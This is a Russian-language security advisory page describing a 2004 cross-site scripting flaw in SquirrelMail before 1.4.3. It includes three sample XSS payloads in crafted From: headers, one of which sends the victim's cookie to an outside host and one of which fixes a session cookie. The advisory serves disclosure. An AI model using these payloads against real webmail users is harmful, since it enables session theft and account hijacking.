Межсайтовый скриптинг в SquirrelMail

Дата публикации:
31.05.2004
Всего просмотров:
1061
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SquirrelMail до версии 1.4.3; 1.5.1

Описание: Уязвимость обнаружена в SquirrelMail. Удаленный пользователь может выполнить XSS нападение.

Удаленный пользователь может послать специально сформированное email сообщение к целевому пользователю, чтобы выполнить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. Пример:

From:<!--<>(-->John Doe<script>window.alert(document.cookie);</scrip t><>

From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx; path=/';</script><>

URL производителя: http://www.squirrelmail.org/

Решение:Исправление доступно через CVS.

Ссылки: EnderUNIX Security Anouncement (Isoqlog and Spamguard)

или введите имя

CAPTCHA